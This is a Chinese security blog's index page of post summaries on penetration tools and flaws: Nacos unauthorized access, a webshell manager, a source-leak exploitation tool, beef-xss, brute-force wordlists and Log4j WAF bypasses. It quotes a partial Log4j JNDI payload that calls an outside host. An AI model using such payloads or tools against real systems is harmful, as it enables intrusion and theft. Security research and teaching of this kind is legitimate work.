websec80

  博客园  :: 首页  :: 新随笔  :: 联系 ::  :: 管理
上一页 1 2 3 4 5 6 7 ··· 11 下一页

2024年3月26日

Nacos 未授权访问漏洞测试+Nacos Hessian 反序列化漏洞利用工具 v0.5
摘要: 漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作 影响版本:Nacos <= 2.0.0-ALPHA.1 阅读全文
posted @ 2024-03-26 10:49 websec80 阅读(3889) 评论(0) 推荐(0)

2024年3月24日

vscan开源、轻量、快速、跨平台 的网站漏洞扫描工具
摘要: https://github.com/veo/vscan 编译/安装/运行 • 参数说明 • 使用方法 • 使用场景 • POC列表 • 自定义扫描器 Features 特征vscan快速的端口扫描、指纹探测功能快速的登录密码爆破功能快速的POC检测功能快速的敏感文件检测功能轻量、开源、跨平台使用支 阅读全文
posted @ 2024-03-24 20:45 websec80 阅读(387) 评论(0) 推荐(0)

2024年3月22日

一款信息泄漏/源代码泄漏利用工具dumpall
摘要: https://github.com/0xHJK/dumpall Dump all: 多种泄漏形式,一种利用方式dumpall dumpall 是一款信息泄漏/源代码泄漏利用工具 https://github.com/0xHJK/dumpall ⚠️ 警告:本工具仅用于授权测试,不得用于非法用途,否 阅读全文
posted @ 2024-03-22 17:10 websec80 阅读(240) 评论(0) 推荐(0)

2024年3月1日

Linux screen命令的用法
摘要: 当谈到在Linux终端中管理会话时,screen是一个非常有用的工具。它允许你在单个终端会话中创建多个虚拟终端,从而可以同时运行多个任务,即使在断开与服务器的连接后也可以保持这些会话。下面是关于screen命令的详细介绍: 1. 安装和启动screen: 通常,screen已经预装在大多数Linux 阅读全文
posted @ 2024-03-01 17:15 websec80 阅读(1186) 评论(0) 推荐(0)

2023年12月28日

通过kali安装源安装beef-xss
摘要: 通过kali安装将 Kali Linux 源添加到 sources.list 文件: 打开 /etc/apt/sources.list 文件,然后将以下行添加到文件末尾: deb http://http.kali.org/kali kali-rolling main non-free contrib 阅读全文
posted @ 2023-12-28 19:14 websec80 阅读(205) 评论(0) 推荐(0)

2023年12月24日

哥斯拉又一个webshell利器
摘要: 哥斯拉是继菜刀、蚁剑、冰蝎之后的又一个webshell利器,这里就不过多介绍了。GitHub地址:https://github.com/BeichenDream/Godzilla很多一线师傅不太了解其中的加解密手法,无法进行解密,这篇文章介绍了解密的方式方法,主要补全了网上缺少的ASP流量分析、PH 阅读全文
posted @ 2023-12-24 12:56 websec80 阅读(651) 评论(0) 推荐(0)

2023年12月8日

Veracrypt文件盘符加密
摘要: Veracrypt怎么用 接下来,我们开始讲解Veracrypt的使用方法。 1、创建一个加密容器 1.1、下载Veracrypt软件,安装并打开。选择“创建加密文件容器”。 下载链接:https://www.veracrypt.fr/en/Downloads.html Copy 1.2、选择容器的 阅读全文
posted @ 2023-12-08 09:09 websec80 阅读(1542) 评论(0) 推荐(0)

2023年12月7日

crunch自定义字典生成
摘要: 说实话平时一般不会自己去生成字典,普通的字典包就够用了,前段时间打红队的时候遇到了一次内网中数据库密码为vule前缀的,但是内网中其他数据库密码还未知,于是就需要以vule前缀自己生成一下密码尝试爆破。就有了这篇文章分享。 wget https://sourceforge.net/projects/ 阅读全文
posted @ 2023-12-07 16:01 websec80 阅读(514) 评论(0) 推荐(0)

2023年12月6日

流量分析入门
摘要: 流量分析 流量分析是CTF里面的常见题目,通常会给我们一堆数据包,然后让我们用Wireshark分析流量包里面的内容排除无关信息然后获取隐藏的flag 链接:https://pan.baidu.com/s/1I-YQhV2VVGE1DZXb_WlnSA?pwd=c93i提取码:c93i 工具: ht 阅读全文
posted @ 2023-12-06 14:27 websec80 阅读(2404) 评论(0) 推荐(0)

2023年12月5日

Log4j一些WAF绕过技巧
摘要: 0x00 前言 CVE-2021-44228 log4j:2.0 <= Apache log4j <= 2.14.1 patched of Java version:6u211+, 7u201+,8u191+, 11.0.1+ 基本Payload: ${jndi:ldap://dnslog.cn/a 阅读全文
posted @ 2023-12-05 10:33 websec80 阅读(1012) 评论(0) 推荐(1)

上一页 1 2 3 4 5 6 7 ··· 11 下一页